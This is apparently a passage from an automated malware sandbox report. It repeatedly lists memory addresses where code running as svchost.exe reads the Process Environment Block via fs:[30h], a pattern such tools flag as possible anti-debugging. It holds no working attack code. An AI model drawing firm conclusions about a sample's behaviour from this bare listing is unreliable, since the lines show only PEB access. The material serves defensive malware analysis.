Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	3_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	3_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B06F1 mov eax, dword ptr fs:[00000030h]	3_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B06F1 mov eax, dword ptr fs:[00000030h]	3_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03434690 mov eax, dword ptr fs:[00000030h]	3_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03434690 mov eax, dword ptr fs:[00000030h]	3_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346C6A6 mov eax, dword ptr fs:[00000030h]	3_2_0346C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034666B0 mov eax, dword ptr fs:[00000030h]	3_2_034666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03438550 mov eax, dword ptr fs:[00000030h]	3_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03438550 mov eax, dword ptr fs:[00000030h]	3_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346656A mov eax, dword ptr fs:[00000030h]	3_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346656A mov eax, dword ptr fs:[00000030h]	3_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346656A mov eax, dword ptr fs:[00000030h]	3_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C6500 mov eax, dword ptr fs:[00000030h]	3_2_034C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]	3_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]	3_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]	3_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]	3_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]	3_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]	3_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03504500 mov eax, dword ptr fs:[00000030h]	3_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]	3_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]	3_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]	3_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]	3_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]	3_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440535 mov eax, dword ptr fs:[00000030h]	3_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]	3_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]	3_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]	3_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]	3_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E53E mov eax, dword ptr fs:[00000030h]	3_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E5CF mov eax, dword ptr fs:[00000030h]	3_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E5CF mov eax, dword ptr fs:[00000030h]	3_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034365D0 mov eax, dword ptr fs:[00000030h]	3_2_034365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	3_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	3_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034325E0 mov eax, dword ptr fs:[00000030h]	3_2_034325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346C5ED mov eax, dword ptr fs:[00000030h]	3_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346C5ED mov eax, dword ptr fs:[00000030h]	3_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03432582 mov eax, dword ptr fs:[00000030h]	3_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03432582 mov ecx, dword ptr fs:[00000030h]	3_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03464588 mov eax, dword ptr fs:[00000030h]	3_2_03464588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E59C mov eax, dword ptr fs:[00000030h]	3_2_0346E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B05A7 mov eax, dword ptr fs:[00000030h]	3_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B05A7 mov eax, dword ptr fs:[00000030h]	3_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B05A7 mov eax, dword ptr fs:[00000030h]	3_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034545B1 mov eax, dword ptr fs:[00000030h]	3_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034545B1 mov eax, dword ptr fs:[00000030h]	3_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]	3_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]	3_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]	3_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]	3_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]	3_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]	3_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]	3_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E443 mov eax, dword ptr fs:[00000030h]	3_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034EA456 mov eax, dword ptr fs:[00000030h]	3_2_034EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342645D mov eax, dword ptr fs:[00000030h]	3_2_0342645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345245A mov eax, dword ptr fs:[00000030h]	3_2_0345245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BC460 mov ecx, dword ptr fs:[00000030h]	3_2_034BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345A470 mov eax, dword ptr fs:[00000030h]	3_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345A470 mov eax, dword ptr fs:[00000030h]	3_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345A470 mov eax, dword ptr fs:[00000030h]	3_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03468402 mov eax, dword ptr fs:[00000030h]	3_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03468402 mov eax, dword ptr fs:[00000030h]	3_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03468402 mov eax, dword ptr fs:[00000030h]	3_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342E420 mov eax, dword ptr fs:[00000030h]	3_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342E420 mov eax, dword ptr fs:[00000030h]	3_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342E420 mov eax, dword ptr fs:[00000030h]	3_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342C427 mov eax, dword ptr fs:[00000030h]	3_2_0342C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]	3_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]	3_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]	3_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]	3_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]	3_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]	3_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B6420 mov eax, dword ptr fs:[00000030h]	3_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346A430 mov eax, dword ptr fs:[00000030h]	3_2_0346A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034304E5 mov ecx, dword ptr fs:[00000030h]	3_2_034304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034EA49A mov eax, dword ptr fs:[00000030h]	3_2_034EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034364AB mov eax, dword ptr fs:[00000030h]	3_2_034364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034644B0 mov ecx, dword ptr fs:[00000030h]	3_2_034644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BA4B0 mov eax, dword ptr fs:[00000030h]	3_2_034BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E4B4B mov eax, dword ptr fs:[00000030h]	3_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E4B4B mov eax, dword ptr fs:[00000030h]	3_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C6B40 mov eax, dword ptr fs:[00000030h]	3_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C6B40 mov eax, dword ptr fs:[00000030h]	3_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FAB40 mov eax, dword ptr fs:[00000030h]	3_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D8B42 mov eax, dword ptr fs:[00000030h]	3_2_034D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DEB50 mov eax, dword ptr fs:[00000030h]	3_2_034DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342CB7E mov eax, dword ptr fs:[00000030h]	3_2_0342CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]	3_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]	3_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]	3_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]	3_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]	3_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]	3_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]	3_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]	3_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AEB1D mov eax, dword ptr fs:[00000030h]	3_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345EB20 mov eax, dword ptr fs:[00000030h]	3_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345EB20 mov eax, dword ptr fs:[00000030h]	3_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F8B28 mov eax, dword ptr fs:[00000030h]	3_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F8B28 mov eax, dword ptr fs:[00000030h]	3_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03450BCB mov eax, dword ptr fs:[00000030h]	3_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03450BCB mov eax, dword ptr fs:[00000030h]	3_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03450BCB mov eax, dword ptr fs:[00000030h]	3_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03430BCD mov eax, dword ptr fs:[00000030h]	3_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03430BCD mov eax, dword ptr fs:[00000030h]	3_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03430BCD mov eax, dword ptr fs:[00000030h]	3_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DEBD0 mov eax, dword ptr fs:[00000030h]	3_2_034DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03438BF0 mov eax, dword ptr fs:[00000030h]	3_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03438BF0 mov eax, dword ptr fs:[00000030h]	3_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03438BF0 mov eax, dword ptr fs:[00000030h]	3_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345EBFC mov eax, dword ptr fs:[00000030h]	3_2_0345EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BCBF0 mov eax, dword ptr fs:[00000030h]	3_2_034BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440BBE mov eax, dword ptr fs:[00000030h]	3_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440BBE mov eax, dword ptr fs:[00000030h]	3_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	3_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	3_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]	3_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]	3_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]	3_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]	3_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]	3_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]	3_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03436A50 mov eax, dword ptr fs:[00000030h]	3_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440A5B mov eax, dword ptr fs:[00000030h]	3_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440A5B mov eax, dword ptr fs:[00000030h]	3_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346CA6F mov eax, dword ptr fs:[00000030h]	3_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346CA6F mov eax, dword ptr fs:[00000030h]	3_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346CA6F mov eax, dword ptr fs:[00000030h]	3_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DEA60 mov eax, dword ptr fs:[00000030h]	3_2_034DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034ACA72 mov eax, dword ptr fs:[00000030h]	3_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034ACA72 mov eax, dword ptr fs:[00000030h]	3_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BCA11 mov eax, dword ptr fs:[00000030h]	3_2_034BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346CA24 mov eax, dword ptr fs:[00000030h]	3_2_0346CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345EA2E mov eax, dword ptr fs:[00000030h]	3_2_0345EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03454A35 mov eax, dword ptr fs:[00000030h]	3_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03454A35 mov eax, dword ptr fs:[00000030h]	3_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346CA38 mov eax, dword ptr fs:[00000030h]	3_2_0346CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03486ACC mov eax, dword ptr fs:[00000030h]	3_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03486ACC mov eax, dword ptr fs:[00000030h]	3_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03486ACC mov eax, dword ptr fs:[00000030h]	3_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03430AD0 mov eax, dword ptr fs:[00000030h]	3_2_03430AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03464AD0 mov eax, dword ptr fs:[00000030h]	3_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03464AD0 mov eax, dword ptr fs:[00000030h]	3_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346AAEE mov eax, dword ptr fs:[00000030h]	3_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346AAEE mov eax, dword ptr fs:[00000030h]	3_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]	3_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]	3_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]	3_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]	3_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]	3_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]	3_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]	3_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]	3_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343EA80 mov eax, dword ptr fs:[00000030h]	3_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03504A80 mov eax, dword ptr fs:[00000030h]	3_2_03504A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03468A90 mov edx, dword ptr fs:[00000030h]	3_2_03468A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03438AA0 mov eax, dword ptr fs:[00000030h]	3_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03438AA0 mov eax, dword ptr fs:[00000030h]	3_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03486AA4 mov eax, dword ptr fs:[00000030h]	3_2_03486AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B0946 mov eax, dword ptr fs:[00000030h]	3_2_034B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03456962 mov eax, dword ptr fs:[00000030h]	3_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03456962 mov eax, dword ptr fs:[00000030h]	3_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03456962 mov eax, dword ptr fs:[00000030h]	3_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0347096E mov eax, dword ptr fs:[00000030h]	3_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0347096E mov edx, dword ptr fs:[00000030h]	3_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0347096E mov eax, dword ptr fs:[00000030h]	3_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D4978 mov eax, dword ptr fs:[00000030h]	3_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D4978 mov eax, dword ptr fs:[00000030h]	3_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BC97C mov eax, dword ptr fs:[00000030h]	3_2_034BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AE908 mov eax, dword ptr fs:[00000030h]	3_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AE908 mov eax, dword ptr fs:[00000030h]	3_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BC912 mov eax, dword ptr fs:[00000030h]	3_2_034BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03428918 mov eax, dword ptr fs:[00000030h]	3_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03428918 mov eax, dword ptr fs:[00000030h]	3_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B892A mov eax, dword ptr fs:[00000030h]	3_2_034B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C892B mov eax, dword ptr fs:[00000030h]	3_2_034C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C69C0 mov eax, dword ptr fs:[00000030h]	3_2_034C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034649D0 mov eax, dword ptr fs:[00000030h]	3_2_034649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FA9D3 mov eax, dword ptr fs:[00000030h]	3_2_034FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BE9E0 mov eax, dword ptr fs:[00000030h]	3_2_034BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034629F9 mov eax, dword ptr fs:[00000030h]	3_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034629F9 mov eax, dword ptr fs:[00000030h]	3_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0 mov eax, dword ptr fs:[00000030h]	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034309AD mov eax, dword ptr fs:[00000030h]	3_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034309AD mov eax, dword ptr fs:[00000030h]	3_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B89B3 mov esi, dword ptr fs:[00000030h]	3_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B89B3 mov eax, dword ptr fs:[00000030h]	3_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B89B3 mov eax, dword ptr fs:[00000030h]	3_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03442840 mov ecx, dword ptr fs:[00000030h]	3_2_03442840
